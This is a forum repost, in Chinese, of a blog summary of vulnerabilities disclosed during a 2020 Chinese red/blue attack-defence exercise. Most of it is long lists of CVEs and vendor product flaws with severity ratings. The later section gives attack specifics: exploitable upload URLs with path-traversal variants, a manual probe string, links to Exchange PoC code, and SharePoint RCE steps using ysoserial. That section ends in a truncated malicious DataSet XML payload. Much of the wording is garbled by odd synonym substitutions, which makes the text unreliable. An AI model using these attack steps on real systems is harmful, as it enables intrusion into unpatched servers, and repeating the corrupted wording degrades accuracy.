nykek5i 发表于 2024-10-10 04:17:53

2020HW时期颁布漏洞总结:深信服,绿盟,天融信,泛微云显现漏洞,害处级别:危急


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">2020年HW已结束,<span style="color: black;">博主</span>汇总了HW<span style="color: black;">时期</span><span style="color: black;">颁布</span>的漏洞,供各位红蓝双方安全<span style="color: black;">科研</span><span style="color: black;">运用</span>。</span></span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;">9月11日-9月23日漏洞(来自补天)</strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">1.深信服EDR某处命令执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">2.深信服SSL VPN 远程代码执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">3.绿盟UTS综合威胁探针信息<span style="color: black;">泄密</span>漏洞,<span style="color: black;">害处</span>级别:危急,官方已发布补丁</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),<span style="color: black;">害处</span>级别:危急,官方已发布补丁</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">5.Apache Cocoon security vulnerability (CVE-2020-11991),<span style="color: black;">害处</span>级别:危急,官方已发布补丁</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">6.天融信TopApp-LB 负载<span style="color: black;">平衡</span>系统SQL注入漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">7.用友GRP-u8 命令执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">8.泛微云桥任意文件读取漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">9.齐治堡垒机前台远程命令执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">10.联软准入系统任意文件上传漏洞EXP公开,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">11.PAN-OS远程代码执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">12.天融信NGFW下一代防火墙漏洞辟谣,<span style="color: black;">害处</span>级别:无</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">13.山石网科下一代防火墙SG-6000漏洞辟谣,<span style="color: black;">害处</span>级别:无</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">14.Nagios 命令执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">15.Weblogic远程命令执行漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">16.IE浏览器远程代码执行漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">17.网御星云VPN老版本存在漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">18.微软NetLogon 权限<span style="color: black;">提高</span>漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">19.致远A8文件上传漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">20.致远A8反序列化漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">21.深信服VPN 任意用户添加漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">22.拓尔思TRSWAS5.0文件读取漏洞,<span style="color: black;">害处</span>级别:中危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">23.Wordpress File-manager任意文件上传,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">24.Apache DolphinScheduler权限<span style="color: black;">提高</span>漏洞(CVE-2020-13922) ,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">25.致远OA任意文件写入漏洞,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">26.Microsoft Exchange远程代码执行漏洞通告,<span style="color: black;">害处</span>级别:危急</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">27.Spectrum Protect Plus任意代码执行漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">28.深信服 SSL VPN Nday - Pre Auth 任意<span style="color: black;">秘码</span>重置漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">29.深信服 SSL VPN 修改绑定手机号码漏洞,等级:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">30.McAfee Web Gateway多个高危漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">31.Yii2框架反序列化远程命令执行漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">32.微软 SQL Server 报表服务远程代码执行漏洞(CVE-2020-0618),<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">33.Spring框架RFD攻击漏洞通告,<span style="color: black;">害处</span>级别:中危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">34.VMware Fusion 权限<span style="color: black;">提高</span>漏洞(CVE-2020-3980),<span style="color: black;">害处</span>级别:中危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">35.Aruba Clearpass远程命令执行漏洞(CVE-2020-7115),<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">36.Yii2框架反序列化远程命令执行漏洞二次更新,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">37.Apache Superset远程代码执行漏洞(CVE-2020-13948)<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">38. Fastadmin文件上传漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">39.WebSphere Application Server XXE 漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">40.建文工程项目管理软件任意文件上传漏洞,<span style="color: black;">害处</span>级别:高危</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;">来自白泽Sec整理的漏洞列表</strong></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">1.VMware Fusion cve-2020-3980权限<span style="color: black;">提高</span></span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2.Apache Cocoon security vulnerability cve-2020-11991</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3.Spring框架RFD(文件下载)</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">4.CVE-2020-0618-SQLServer报表服务远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">5.CVE-2020-7115-Aruba Clearpass远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">6.CVE-2020-15148-Yii 2框架反序列化远程命令执漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">7.CVE-2020-13948-Apache Superset 远程代码执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">8.深信服 SSL VPN Nday - Pre Auth 修改绑定手机</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">9.深信服 SSL VPN Nday - Pre Auth 任意<span style="color: black;">秘码</span>重置</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">10.CVE-2020-1472-NetLogon特权<span style="color: black;">提高</span>漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">11.CVE-2020-2040-PAN-OS远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">12.ThinkPHP3.x注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">13.用友GRP-u8 SQL注入</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">14.泛微云桥任意文件读取</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">15.联软准入文件上传漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">16.奇治堡垒机 Python代码注入</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">17.用友GRP-u8 命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">18.Nagios命令执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">19.Weblogic远程命令执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">20.网御星云VPN老版本漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">21.拓尔思5.0文件读取漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">22.wordpress File-manager任意文件上传</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">23.天融信TOPApp-LB负载<span style="color: black;">平衡</span>SQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">24.绿盟UTS综合威胁探针管理员任意登录</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">25.深信服EDR3.2.21远程代码执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">26.CVE-2020-11974-Apache DolphinScheduler远程执行代码漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">27.CVE-2020-11107-XAMPP任意命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">28.CVE-2020-16875-Exchange远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">29.深信服EDR远程代码 执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">30.CVE-2020-24616-Jackson 多个反序列化安全漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">31.宝塔面板888端口pma未授权<span style="color: black;">拜访</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">32.深信服 EDR 任意用户登录漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">33.泛微e-cology某版本存在RCE漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">34.CVE-2020-13933-Apache Shiro 权限绕过漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">35.通达OA11.6未授权远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">36.深信服EDR远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">37.天融信数据防泄漏系统未授权修改管理员<span style="color: black;">秘码</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">38.CVE-2020-11995-Apache Dubbo远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">39.PHPCMS v9全版本前台RCE</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">40.CVE-2019-0230-Struts2远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">41.CVE-2020-13699-TeamViewer全版本无<span style="color: black;">秘码</span>连接</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">42.CVE-2020-13921-Apache SkyWalking SQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">43.CVE-2020-13925-Apache Kylin 远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">44.CVE-2020-1350-Windows DNS Server远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">45.CVE-2020-14645-Weblogic命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">46.CVE-2020-8194-Citrix代码注入等系列漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">47.CVE-2020-10977-Gitlab CE/EE任意文件读取/RCE</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">48.CVE-2020-8193-Citrix ADC远程代码执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">49.CVE-2020-5902-F5 BIG-IP TMUI 远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">50.CVE-2020-9498-Apache Guacamole RDP 远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">51.CVE-2020-9480-Apache Spark远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">52.CVE-2020-11989-Apache Shiro身份验证绕过漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">53.CVE-2020-1948-Apache Dubbo反序列化漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">54.CVE-2020-9483-Apache SkyWalkingSQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">55.CVE-2020-4450-WebSphere远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">56.用友NC6.5反序列化漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">57.CVE-2020-3956-VMware Cloud Director 代码注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">58.CVE-2020-5410-Spting-Cloud-Config-Server目录遍历</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">59.CVE-2020-1956-Apache Kylin远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">60.Fastjson &lt;= 1.2.68 远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">61.CVE-2020-9484-Apache Tomcat session持久化远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">62.vBulletin 5.6.1 SQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">63.CVE-2020-11651-SaltStack认证绕过漏洞/命令执行</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">64.CVE-2020-11652-SaltStack目录遍历漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">65.通达OA11.4存在越权登录漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">66.CVE-2020-4362-WebSphere远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">67.通达OA11.5存在多处SQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">68.CVE-2020-1947-ShardingShpere命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">69.通达OA文件<span style="color: black;">包括</span>漏洞和SQL注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">70.CVE-2020-0796 SMBV3远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">71.CVE-2020-0688-Exchange远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">72.CVE-2020-1938-Apache Tomcat文件<span style="color: black;">包括</span>漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">73.CVE-2019-17564-Apache Dubbo反序列化漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">78.CVE-2020-0601-签名伪造</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">79.ThinkPHP6 任意文件操作漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">80.CVE-2020-2551-Weblogic反序列化漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">81.CVE-2020-2555-Weblogic反序列化漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">82.CVE-2020-9951 Apple Safari 远程执行代码漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">83.CVE-2020-9992 Apple Xcode 远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">84.Citrix Systems 多款<span style="color: black;">制品</span>存在安全漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">85.CVE-2020-8245</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">86.CVE-2020-8246</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">87.CVE-2020-8247</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">88.CVE-2020-11861 KM03709900 操作代理,本地特权漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">89.CVE-2020-11699 SpamTitan 7.07 多个RCE漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">90.CVE-2020-11699</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">91.CVE-2020-11699</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">92.CVE-2020-11699</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">93.CVE-2020-7115 Aruba Clearpass 远程命令执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">94.CVE-2020-0688 Microsoft Exchange Server远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">95.CVE-2020-1035 Microsoft Internet Explorer VBScript Engine 远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">96.CVE-2020-1048 Microsoft Windows Print Spooler 安全漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">97.CVE-2020-1092 Microsoft Internet Explorer 远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">98.CVE-2020-16875 Microsoft Exchange远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">99.CVE-2020-8028 SUSE<span style="color: black;">拜访</span><span style="color: black;">掌控</span>错误漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">100.CVE-2020-25751 Joomla paGO Commerce 2.5.9.0 SQL 注入</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">101.CVE-2020-16860 Microsoft Dynamics 365远程代码执行漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">102.CVE-2020-15920 Mida Solutions eFramework ajaxreq.php 命令注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">103.CVE-2020-12109 TP-Link云摄像头 NCXXX系列存在命令注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">104.CVE-2020-5421 SPRING FRAMEWORK反射型文件下载漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">105.CVE-2020-25790 Typesetter CMS任意文件上传</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">106.CVE-2020-4643 IBM WebSphere 存在XXE<span style="color: black;">外边</span>实体注入漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">107.webTareas存在多个安全漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">108.CNNVD-202009-1177</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">109.CNNVD-202009-1176</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">110.CNNVD-202009-1175</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">112.CVE-2020-1350 Microsoft Windows Server DNS Server 缓冲区错误漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">113.PHPCMS V9 存在RCE漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">114.QEMU-KVM越界读写漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">115.Cochip无线路由器绕过认证<span style="color: black;">泄密</span>账号<span style="color: black;">秘码</span>漏洞</p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">116.CVE-2020-4450 WebSphere远程代码执行漏洞</p>117.CVE-2020-13933 Apache shiro权限绕过漏洞

    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><strong style="color: blue;">来自</strong><strong style="color: blue;">IDLab</strong><strong style="color: blue;">整理的漏洞详情</strong></span></p><span style="color: black;"><strong style="color: blue;">01.联软任意文件上传漏洞</strong></span><span style="color: black;"><span style="color: black;">已知存在漏洞的url如下:http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(<span style="color: black;">仅有</span>201904-1SP起才存在该漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在该漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/..;/..;/updateDevUploadinfo.htm(<span style="color: black;">仅有</span>201904-1SP起才存在该漏洞)http://IP:80/uai/download/download/download/..;/..;/uploadfileToPath.htm (受影响的版本都存在该漏洞)</span></span><span style="color: black;"><strong style="color: blue;"><span style="color: black;">02.网瑞达资源<span style="color: black;">拜访</span><span style="color: black;">掌控</span>系统命令执行漏洞</span></strong></span><span style="color: black;">手工检测:<span style="color: black;">运用</span>普通账户登录进入主界面,在输入框中输入1.1.1.1@127.0.0.1:8860并点击立即<span style="color: black;">转</span>,<span style="color: black;">转</span>页面若<span style="color: black;">包括</span>pong字符串则存在漏洞。</span><span style="color: black;"><span style="color: black;">br</span></span><span style="color: black;"><strong style="color: blue;"><span style="color: black;">03.Exchange Server 远程代码执行漏洞</span></strong></span><span style="color: black;">前提:需要一个Exchange用户账号。就能在Exchange服务器上执行任意命令POC<span style="color: black;">位置</span>:https://srcincite.io/pocs/cve-2020-16875.py.txthttps://srcincite.io/pocs/cve-2020-16875.ps1.txt</span><span style="color: black;"><span style="color: black;">br</span></span><span style="color: black;"><strong style="color: blue;"><span style="color: black;">04.SharePoint远程代码执行漏洞</span></strong></span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">1.<span style="color: black;">运用</span>ysoserial工具生成payload</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0Oicx8r0SrndlJW341WghcxY8mV5GJxQSpuZblHrlwXMCGjdS7iay2ZF4g/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">2.将生成的payload拼接到poc</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0OTlfk0ftMWNbtcnzmYsJoo48mFDsxLnZrFHzrOicOPKJH0gQeXp8sFxA/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">3.服务器iis主进程中<span style="color: black;">起步</span>了calc.exe</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/K9JoBxX2CgBpJXPyh5lWzcAlXIc7jJ0Ou4dt8xTCWTTgIdr0BE0pZ94KU1EOmlQ7B8BDOIoX3EOibAmAtHFvicHw/640?wx_fmt=png&amp;tp=webp&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">pox.xml</span></p><span style="color: black;"><span style="color: black;">&lt;<span style="color: black;">DataSet</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:schema</span> <span style="color: black;">xmlns</span>=<span style="color: black;">""</span> <span style="color: black;">xmlns:xs</span>=<span style="color: black;">"http://www.w3.org/2001/XMLSchema"</span> <span style="color: black;">xmlns:msdata</span>=<span style="color: black;">"urn:schemas-microsoft-com:xml-msdata"</span> <span style="color: black;">id</span>=<span style="color: black;">"somedataset"</span>&gt;</span> <span style="color: black;">&lt;<span style="color: black;">xs:element</span> <span style="color: black;">name</span>=<span style="color: black;">"somedataset"</span> <span style="color: 